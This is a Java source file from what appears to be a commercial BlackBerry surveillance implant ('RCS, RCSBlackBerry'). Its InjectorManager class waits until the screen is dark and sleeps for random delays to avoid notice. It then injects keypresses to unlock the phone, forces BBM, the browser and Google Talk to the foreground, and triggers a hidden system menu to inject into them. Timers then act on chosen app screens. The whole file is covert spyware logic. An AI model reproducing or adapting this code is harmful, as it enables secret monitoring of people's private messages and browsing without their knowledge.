

/* *************************************************
 * Copyright (c) 2010 - 2012
 * HT srl,   All rights reserved.
 * 
 * Project      : RCS, RCSBlackBerry
 * *************************************************/

package blackberry.injection;

import java.util.Timer;
import java.util.TimerTask;

import net.rim.blackberry.api.menuitem.ApplicationMenuItemRepository;
import net.rim.device.api.system.ApplicationDescriptor;
import net.rim.device.api.system.ApplicationManager;
import net.rim.device.api.system.Backlight;
import net.rim.device.api.system.CodeModuleManager;
import net.rim.device.api.ui.Keypad;
import net.rim.device.api.ui.Screen;
import net.rim.device.api.ui.UiApplication;
import blackberry.AppListener;
import blackberry.Device;
import blackberry.Singleton;
import blackberry.Status;
import blackberry.debug.Check;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.injection.injectors.AInjector;
import blackberry.injection.injectors.BBMInjector;
import blackberry.injection.injectors.BrowserInjector;
import blackberry.injection.injectors.GoogleTalkInjector;
import blackberry.interfaces.ApplicationObserver;
import blackberry.interfaces.BacklightObserver;
import blackberry.interfaces.iSingleton;
import blackberry.utils.Utils;

/**
 * Singleton class used to manage injections of Injector-s. Once initialized, it
 * reacts on backlight and on applicationChange.
 * 
 * @author Zeno
 * 
 */
public class InjectorManager implements ApplicationObserver, iSingleton,
        BacklightObserver {
    private static final long APP_TIMER_PERIOD = 5000;
    private static final long GUID = 0x58b6431f259bac8dL;
    private static final int RUNON_APP = 1;
    private static final int RUNON_BACKLIGHT = 2;
    private static final int KEY_LOCK = 4099;

    private static final int MAX_TRIES = 3;





    private static InjectorManager instance;

    AInjector[] injectors;
    //Hashtable injectorMap = new Hashtable();

    ApplicationManager manager = ApplicationManager.getApplicationManager();

    private InjectorSystemMenu menu;

    private String actualMod;
    private String actualName;
    private AInjector injector;
    private boolean injecting;
    private int started = 0;
    private Status status = Status.self();

    public synchronized static InjectorManager getInstance() {

        if (instance == null) {
            instance = (InjectorManager) Singleton.self().get(GUID);
            if (instance == null) {
                final InjectorManager singleton = new InjectorManager();
                Singleton.self().put(GUID, singleton);
                instance = singleton;
            }

        }
        return instance;
    }

    private InjectorManager() {
        // TODO: aggiungere new LiveInjector(), new YahooInjector()
        injectors = new AInjector[] { new BrowserInjector(), new BBMInjector(),
                new GoogleTalkInjector() };

        for (int i = 0; i < injectors.length; i++) {
            injector = injectors[i];
            if (!exists(injector.getCodName())) {




                injector.disable();
            }
        }
    }

    public void start() {







        synchronized (this) {
            started += 1;

            if (started > 1) {



                return;
            }
        }

        AppListener appListener = AppListener.getInstance();
        appListener.addApplicationObserver(this);
        appListener.addBacklightObserver(this);

        //appListener.suspendable(true);

        if (!Backlight.isEnabled()) {
            injectAll();
        }

    }

    public void stop() {
        synchronized (this) {
            started -= 1;
            if (started > 0) {



                return;
            }
        }





        AppListener appListener = AppListener.getInstance();
        appListener.removeApplicationObserver(this);
        appListener.removeBacklightObserver(this);
        if (menu != null) {
            menu.removeMenu();
        }
        //if (injectorMap != null) {
        //    injectorMap.clear();
        //}

    }

    /**
     * Tries to inject all the applications.
     * 
     * @return true if all injected
     */
    private void injectAll() {
        synchronized (this) {
            if (injecting) {
                return;
            }
            injecting = true;
        }

        try {

            boolean allInjected = true;
            for (int i = 0; i < injectors.length; i++) {
                injector = injectors[i];

                allInjected &= inject(injector);
            }

        } finally {
            synchronized (this) {
                injecting = false;
            }
        }

    }

    /**
     * 
     * @param injector
     * @return true if it's not needed to inject anymore, because injected or
     *         disabled
     */
    private boolean inject(AInjector injector) {




        boolean wantLight = Status.self().wantLight();




        if (!injector.enabled()) {



            return true;
        }

        if (injector.isInjected()) {



            return true;
        }

        if (injector.getTries() > MAX_TRIES) {



            return true;
        }

        if (status.backlightEnabled()) {



            return false;
        }

        String name = injector.getCodName();
        //injectorMap.put(name, injector);

        status.setBacklight(false);
        manager.requestForegroundForConsole();

        if (wantLight) {
            Debug.ledFlash(Debug.COLOR_RED);
        }

        unLock();

        if (wantLight) {
            Debug.ledStart(Debug.COLOR_ORANGE);
        }

        if (Status.self().isDemo()) {
            Utils.sleep(1000);
        } else {
            Utils.sleep(Utils.randomInt(5, 10) * 1000);
        }

        if (wantLight) {
            Debug.ledStop();
        }

        if (status.backlightEnabled()) {



            if (wantLight) {
                Debug.playSoundError(1);
            }
            return false;
        }

        if (wantLight) {
            Debug.ledFlash(Debug.COLOR_YELLOW);
        }
        if (requestForeground(name)) {
            if (wantLight) {
                Debug.ledFlash(Debug.COLOR_GREEN);
            }





            if (status.backlightEnabled()) {



                if (wantLight) {
                    Debug.playSoundError(2);
                }
                return false;
            }
            injector.incrTries();

            Utils.sleep(1000);
            if (checkForeground(name)) {

                if (status.backlightEnabled()) {



                    if (wantLight) {
                        Debug.playSoundError(3);
                    }
                    return false;
                }

                if (wantLight) {
                    Debug.ledFlash(Debug.COLOR_BLUE_LIGHT);
                }

                addSystemMenu(injector);

                Utils.sleep(300);
                callSystemMenu();
                Utils.sleep(600);
                //if (checkForeground(name)) {
                //    callSystemMenuRecover();
                //}

                removeSystemMenu();

                manager.requestForegroundForConsole();
                if (wantLight) {
                    Debug.ledFlash(Debug.COLOR_WHITE);
                }
            }
        }
        return false;
    }

    private boolean checkForeground(String codname) {
        int foregroundPin = manager.getForegroundProcessId();
        ApplicationDescriptor[] apps = manager.getVisibleApplications();
        for (int i = 0; i < apps.length; i++) {



            if (apps[i].getModuleName().indexOf(codname) >= 0) {
                int processId = manager.getProcessId(apps[i]);

                if (foregroundPin == processId) {



                    return true;
                } else {



                    return false;
                }
            }
        }
        return false;
    }

    private void addSystemMenu(AInjector injector) {



        menu = new InjectorSystemMenu(this, injector);
        menu.addMenu();

    }

    private void callSystemMenu() {




        int waitTime = 500;






        KeyInjector.pressRawKeyCode(Keypad.KEY_MENU);

        /*
         * if(injector.isLastTry()){
         * KeyInjector.pressRawKeyCode(Keypad.KEY_MENU); }
         */

        Utils.sleep(waitTime);

        KeyInjector.trackBallRaw(20, true);
        if (Device.getInstance().atLeast(7, 0)) {




        } else {



            KeyInjector.pressRawKey(menu.toString().toLowerCase().charAt(0));
        }

        Utils.sleep(waitTime);
        KeyInjector.trackBallRawClick();
        //KeyInjector.pressRawKeyCode(Keypad.KEY_MENU);
        //Utils.sleep(waitTime);
        //KeyInjector.pressRawKeyCode(Keypad.KEY_ESCAPE);

    }

    private void callSystemMenuRecover() {
        KeyInjector.pressRawKeyCode(Keypad.KEY_MENU);
        Utils.sleep(500);
        KeyInjector.pressRawKeyCode(Keypad.KEY_ESCAPE);
    }

    /**
     * verifica se occorre procedere con l'unlock.
     */
    public static boolean unLock() {





        Status status = Status.self();

        if (status.backlightEnabled()) {
            return false;
        }

        try {

            KeyInjector.pressRawKeyCode(Keypad.KEY_ESCAPE);
            Utils.sleep(300);

            if (status.backlightEnabled()) {





                KeyInjector.pressRawKeyCode(Keypad.KEY_SPEAKERPHONE);
                KeyInjector.pressRawKeyCode(InjectorManager.KEY_LOCK);
                status.setBacklight(false);
                Utils.sleep(100);
                status.setBacklight(false);
                for (int i = 0; i < 10; i++) {
                    if (status.backlightEnabled()) {
                        //Backlight.enable(false);
                        Utils.sleep(500);



                    } else {
                        return true;

                    }
                }
            }
        } finally {
            //Main.getInstance().popBlack();
        }
        return false;
    }

    private void removeSystemMenu() {




        ApplicationMenuItemRepository.getInstance().removeMenuItem(
                ApplicationMenuItemRepository.MENUITEM_SYSTEM, menu);

    }

    private boolean requestForeground(String codName) {
        int foregroundPin = manager.getForegroundProcessId();
        ApplicationDescriptor[] apps = manager.getVisibleApplications();
        for (int i = 0; i < apps.length; i++) {
            if (apps[i].getModuleName().indexOf(codName) >= 0) {
                int processId = manager.getProcessId(apps[i]);

                if (foregroundPin == processId) {



                    return true;
                } else {



                    manager.requestForeground(processId);
                    return true;
                }
            }
        }

        return false;
    }

    private ApplicationDescriptor getApplicationDescriptor(String executeName) {









        final int handles[] = CodeModuleManager.getModuleHandles();

        final int size = handles.length;
        for (int i = 0; i < size; i++) {
            final int handle = handles[i];
            // CodeModuleManager.getModuleHandle(name)
            // Retrieve specific information about a module.

            final String name = CodeModuleManager.getModuleName(handle);
            if (name.equals(executeName)) {



                ApplicationDescriptor[] apps = CodeModuleManager
                        .getApplicationDescriptors(handle);
                if (apps != null && apps.length > 0) {



                    return apps[0];

                }
            }
        }




        return null;

    }

    /**
     * check if a codname is installed in the system
     * 
     * @param name
     * @return
     */
    private boolean exists(String name) {
        final int handles[] = CodeModuleManager.getModuleHandles();

        final int size = handles.length;
        for (int i = 0; i < size; i++) {
            final int handle = handles[i];
            // CodeModuleManager.getModuleHandle(name)
            // Retrieve specific information about a module.
            final String modname = CodeModuleManager.getModuleName(handle);
            if (modname.equals(name)) {



                return true;
            }
        }
        return false;
    }

    public void runOnBacklight() {




        UiApplication.getUiApplication().invokeLater(new Runnable() {
            public void run() {
                injectAll();
            }
        });
    }

    /**
     * questa funzione viene chiamata ogni n secondi, se l'applicazione e' di
     * interesse
     */
    public void runOnApp() {




        //final AInjector injector = (AInjector) injectorMap.get(actualMod);

        final AInjector injector = (AInjector) findValidInjector(actualMod);

        if (injector != null && injector.enabled() && injector.isInjected()) {
            final Screen screen = injector.getInjectedApp().getActiveScreen();
            String screenName = screen.getClass().getName();








            for (int i = 0; i < injector.getWantedScreen().length; i++) {
                String s = injector.getWantedScreen()[i];
                if (screenName.endsWith(s)) {




                    UiApplication.getUiApplication().invokeLater(
                            new Runnable() {

                                public void run() {
                                    injector.init();
                                    injector.playOnScreen(screen);
                                }
                            });

                    break;
                }
            }
        }
    }

    private AInjector findValidInjector(String codName) {
        try {



            for (int i = 0; i < injectors.length; i++) {
                AInjector injector = injectors[i];
                if(injector==null){



                    continue;
                }
                
                if (codName.equals(injector.getCodName()) && injector.enabled() && injector.isInjected()) {
                    return injector;
                }
            }
        } catch (Exception ex) {




        }

        return null;
    }

    class RunInjectorTask extends TimerTask {

        private int runOn;

        RunInjectorTask(int runOn) {
            this.runOn = runOn;

        }

        public void run() {
            if (runOn == RUNON_APP) {
                runOnApp();
            } else if (runOn == RUNON_BACKLIGHT) {
                runOnBacklight();
            }
        }

    }

    boolean foreInterestApp = false;

    public void onApplicationChange(String startedName, String stoppedName,
            String startedMod, String stoppedMod) {






        //Status status=Status.self();        

        try {
            if (status.applicationTimer != null) {
                status.applicationTimer.cancel();
                status.applicationTimer = null;
            }

            if (findValidInjector(startedMod)!=null) {
                foreInterestApp = true;



                this.actualMod = startedMod;
                this.actualName = startedName;
                startApplicationTimer();
            } else {



                foreInterestApp = false;
            }
        } catch (Exception ex) {




        }

    }

    private void startApplicationTimer() {
        status.applicationTimer = new Timer();

        RunInjectorTask task = new RunInjectorTask(RUNON_APP);
        status.applicationTimer.schedule(task, APP_TIMER_PERIOD,
                APP_TIMER_PERIOD);
    }

    public void onBacklightChange(boolean value) {



        if (!value) {
            if (status.applicationTimer != null) {
                status.applicationTimer.cancel();
                status.applicationTimer = null;
            }

            status.applicationTimer = new Timer();
            RunInjectorTask task = new RunInjectorTask(RUNON_BACKLIGHT);

            int waitSeconds = Utils.randomInt(11, 30);



            status.applicationTimer.schedule(task, waitSeconds * 1000,
                    Integer.MAX_VALUE);
        } else {
            if (foreInterestApp) {
                startApplicationTimer();
            }
        }
    }

}
